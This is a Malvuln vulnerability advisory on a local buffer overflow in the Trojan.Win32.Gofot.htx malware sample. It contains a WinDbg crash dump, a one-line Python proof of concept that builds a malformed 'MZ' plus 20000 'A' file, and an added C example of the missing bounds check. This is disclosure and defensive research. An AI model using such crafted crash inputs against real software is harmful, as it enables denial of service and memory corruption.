Trojan.Win32.Gofot.htx malware suffers from a buffer overflow vulnerability.
f0fd12c55a50d4ef03b089c656756cc3
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/ae062bfe4abd59ac1b9be693fbc45f60.txt
Contact: [email protected]
Media: twitter.com/malvuln
Threat: Trojan.Win32.Gofot.htx
Vulnerability: Local File Buffer Overflow
Description: HackerJLY PE Parser tool V1.0.1.8 doesn't properly check the files it loads, which triggers a local buffer overflow. Analyzing the crash, we can see an overwrite of the CX (16-bit) part of the ECX register with our 41414141 exploit pattern.
Type: PE32
MD5: ae062bfe4abd59ac1b9be693fbc45f60
Vuln ID: MVID-2021-0110
Dropped files:
ASLR: True
DEP: True
Safe SEH: True
Disclosure: 02/25/2021
Memory Dump:
0:000> dd cx
00004141 ???????? ???????? ???????? ????????
(1f60.100): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=45d84141 edx=0057e577 esi=00000003 edi=00000003
eip=7710ed3c esp=0057d9c8 ebp=0057db58 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
ntdll!ZwWaitForMultipleObjects+0xc:
7710ed3c c21400 ret 14h
0:000> .ecxr
eax=04970001 ebx=00000000 ecx=45d84141 edx=0057e577 esi=0057e3a0 edi=0057e570
eip=00dca142 esp=0057e34c ebp=0057e34c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
*** WARNING: Unable to verify checksum for Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe
*** ERROR: Module load completed but symbols could not be loaded for Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe
Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xa142:
00dca142 813950450000 cmp dword ptr [ecx],4550h ds:002b:45d84141=????????
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for SkinH.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for SkinH.dll -
FAULTING_IP:
Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142
00dca142 813950450000 cmp dword ptr [ecx],4550h
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00dca142 (Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x0000a142)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 45d84141
Attempt to read from address 45d84141
DEFAULT_BUCKET_ID: INVALID_POINTER_READ
PROCESS_NAME: Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe
OVERLAPPED_MODULE: Address regions for 'd3d10warp' and 'resourcepolicyclient.dll' overlap
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 45d84141
READ_ADDRESS: 45d84141
FOLLOWUP_IP:
Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142
00dca142 813950450000 cmp dword ptr [ecx],4550h
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
FAULTING_THREAD: 00000100
PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ
LAST_CONTROL_TRANSFER: from 00dcab0f to 00dca142
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0057e34c 00dcab0f 0057e570 097c119a 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xa142
0057e37c 00dd0af8 046acc58 0057e577 097c1746 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xab0f
0057e5a0 00dd1d78 046acc58 097c1756 00000111 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x10af8
0057e928 00df676d 00f2fe28 0057f7f0 0057e968 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x11d78
0057e938 00df697c 0057f7f0 000003e9 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3676d
0057e968 00ecb1a4 000003e9 00000000 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3697c
0057e98c 00df3e09 000003e9 00000000 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x10b1a4
0057e9dc 00df96fe 00000000 0080072c 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x33e09
0057e9f0 00df4771 000003e9 0080072c 097c184e Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x396fe
0057eaa8 00defe3e 00000111 000003e9 0080072c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x34771
0057eac8 00df32bb 00000111 000003e9 0080072c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fe3e
0057eb3c 00df334a 0057f7f0 00d802be 00000111 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x332bb
0057eb5c 76eee0bb 00d802be 00000111 000003e9 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3334a
0057eb88 76ef8849 00df3314 00d802be 00000111 user32!_InternalCallWinProc+0x2b
0057ebac 76efb145 00000111 000003e9 0080072c user32!InternalCallWinProc+0x20
0057ec7c 76ef833a 00df3314 00000000 00000111 user32!UserCallWinProcCheckWow+0x1be
0057ecc0 76edf38b 00000111 000003e9 0080072c user32!CallWindowProcAorW+0xd4
0057ecd8 1002285c ffff04db 00d802be 00000111 user32!CallWindowProcA+0x1b
0057ed34 76ef8849 1001f2d0 00d802be 00000111 SkinH+0x2285c
0057ed58 76efb145 00000111 000003e9 0080072c user32!InternalCallWinProc+0x20
0057ee28 76ee8503 1001f2d0 00000000 00000111 user32!UserCallWinProcCheckWow+0x1be
0057ee90 76ee8aa0 03027740 00000000 00000111 user32!DispatchClientMessage+0x1b3
0057eed8 77110bcd 0057eef4 00000020 0057f184 user32!__fnDWORD+0x50
0057ef10 73ee2a4c 76efa9fd 00d802be 00000111 ntdll!KiUserCallbackDispatcher+0x4d
0057ef14 76efa9fd 00d802be 00000111 000003e9 win32u!NtUserMessageCall+0xc
0057ef80 76edb95b 03027740 00000000 0080072c user32!SendMessageWorker+0x860
0057efa8 73836934 00d802be 00000111 000003e9 user32!SendMessageW+0x5b
0057efc8 738368f9 007286c0 00000202 00000000 comctl32!Button_NotifyParent+0x39
0057efe0 7384c14b 7384b890 0080072c 00000000 comctl32!Button_ReleaseCapture+0x9b
0057f074 76eee0bb 0080072c 00000202 00000000 comctl32!Button_WndProc+0x8bb
0057f0a0 76ef8849 7384b890 0080072c 00000202 user32!_InternalCallWinProc+0x2b
0057f0c4 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20
0057f194 76ef833a 7384b890 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be
0057f1d8 76edfbab 00000202 00000000 00150024 user32!CallWindowProcAorW+0xd4
0057f1f0 73a676f5 7384b890 0080072c 00000202 user32!CallWindowProcW+0x1b
0057f214 00defcc9 7384b890 0080072c 00000202 apphelp!DWM8AND16BitHook_CallWindowProcW+0x35
0057f234 00defe55 00000202 00000000 00150024 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fcc9
0057f250 00df32bb 00000202 00000000 00150024 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fe55
0057f2c4 00df334a 0057f924 0080072c 00000202 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x332bb
0057f2e4 76eee0bb 0080072c 00000202 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3334a
0057f310 76ef8849 00df3314 0080072c 00000202 user32!_InternalCallWinProc+0x2b
0057f334 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20
0057f404 76ef833a 00df3314 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be
0057f44c 76edf38b 00000202 00000000 00150024 user32!CallWindowProcAorW+0xd4
0057f464 10007514 ffff039b 0080072c 00000202 user32!CallWindowProcA+0x1b
0057f4d8 76ef8849 10011fd0 0080072c 00000202 SkinH+0x7514
0057f4fc 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20
0057f5cc 76ee90dc 10011fd0 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be
0057f638 76edb2ee 006f0588 00000000 00000100 user32!DispatchMessageWorker+0x4ac
0057f66c 00e0a996 00d802be 006f0588 097c0426 user32!IsDialogMessageW+0x17e
0057f6c0 00df5c7c 0057f7f0 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x4a996
0057f6d4 00df0cb5 006f0588 0057f6f4 00dee82c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x35c7c
0057f6e0 00dee82c 006f0588 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x30cb5
0057f6f4 00df96b9 006f0588 00d802be 0057f718 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2e82c
0057f704 00df289a 006f0588 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x396b9
0057f718 00df7765 00d802be 006f0588 006f0558 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3289a
0057f730 00df78bf 006f0588 0057f748 00df77b0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x37765
0057f73c 00df77b0 006f0588 0057f780 00df790c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x378bf
0057f748 00df790c 006f0588 00000000 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x377b0
0057f780 00deeed5 00000004 097c052a 00f61b48 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3790c
0057f7cc 00dcf1f9 097c053e 00f61b48 00f61b48 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2eed5
0057fb44 00e20c1d 00fc7b10 00000000 00353000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xf1f9
0057fb58 00dd59c4 00dc0000 00000000 006e1eb8 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x60c1d
0057fbe8 76198654 00353000 76198630 1507c2ff Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x159c4
0057fbfc 77104a77 00353000 1fe72005 00000000 kernel32!BaseThreadInitThunk+0x24
0057fc44 77104a47 ffffffff 77129ece 00000000 ntdll!__RtlUserThreadStart+0x2f
0057fc54 00000000 00fc7b10 00353000 00000000 ntdll!_RtlUserThreadStart+0x1b
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60
IMAGE_NAME: Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 59b2a1cb
STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe!Unknown
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142
Exploit/PoC:
python -c "print( 'MZ'+'A'*20000)" > pbarbar.exe
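Added example (not part of the original advisory, not the parser's code): a bounds-checked lookup of the NT headers in C, showing the check the faulting `cmp dword ptr [ecx],4550h` lacks. With the PoC's "MZ" followed by 0x41 bytes, e_lfanew at offset 0x3c reads as 0x41414141, and the faulting address 45d84141 is consistent with that value added to a file mapping at 04970000 (my inference from the dump, not a statement in the advisory); the layout constants are defined locally so the code builds without <windows.h>, and both input buffers are constructed inline.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
/* PE layout constants defined locally so this builds without <windows.h>. */
#define DOS_HEADER_SIZE  64u      /* sizeof(IMAGE_DOS_HEADER) */
#define E_LFANEW_OFFSET  60u      /* 0x3c: offset of e_lfanew in the DOS header */
#define DOS_MAGIC        0x5A4Du  /* "MZ" */
#define NT_SIGNATURE     0x4550u  /* "PE\0\0", the 4550h the crashing cmp looks for */

enum pe_status { PE_OK = 0, PE_ERR_TOO_SHORT, PE_ERR_BAD_DOS_MAGIC,
                 PE_ERR_LFANEW_OUT_OF_RANGE, PE_ERR_BAD_NT_SIGNATURE };

static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }

/* Locate the NT headers without trusting e_lfanew. The parser in the advisory
   does the equivalent of rd32(buf + e_lfanew) unconditionally, which is the
   `cmp dword ptr [ecx],4550h` that faults; the range check below is what it lacks. */
enum pe_status pe_locate_nt_headers(const uint8_t *buf, size_t len, uint32_t *nt_off)
{
    if (len < DOS_HEADER_SIZE)              return PE_ERR_TOO_SHORT;
    if (rd16(buf) != DOS_MAGIC)             return PE_ERR_BAD_DOS_MAGIC;
    uint32_t lfanew = rd32(buf + E_LFANEW_OFFSET);
    if (lfanew > len - 4)                   return PE_ERR_LFANEW_OUT_OF_RANGE;
    if (rd32(buf + lfanew) != NT_SIGNATURE) return PE_ERR_BAD_NT_SIGNATURE;
    *nt_off = lfanew;
    return PE_OK;
}

/* Constructed input 1: the advisory's PoC layout, "MZ" followed by 20000 'A's,
   so e_lfanew reads as 0x41414141 and must be rejected before any dereference. */
enum pe_status check_poc_layout(void)
{
    static uint8_t poc[20002]; uint32_t off = 0;
    memset(poc, 'A', sizeof poc);
    poc[0] = 'M'; poc[1] = 'Z';
    return pe_locate_nt_headers(poc, sizeof poc, &off);
}

/* Constructed input 2: a minimal well-formed header with e_lfanew = 0x40 and
   "PE\0\0" at that offset. Returns the located offset, or -1 if rejected. */
int minimal_valid_nt_offset(void)
{
    static uint8_t img[72]; uint32_t off = 0;
    memset(img, 0, sizeof img);
    img[0] = 'M'; img[1] = 'Z';
    img[E_LFANEW_OFFSET] = 0x40;       /* little-endian 0x00000040 */
    img[0x40] = 'P'; img[0x41] = 'E';  /* bytes 0x42 and 0x43 stay zero */
    return pe_locate_nt_headers(img, sizeof img, &off) == PE_OK ? (int)off : -1;
}
```

The same check applies to every other file-relative offset a PE parser follows (section table, data directories): compare against the mapped length before reading, not after.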
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).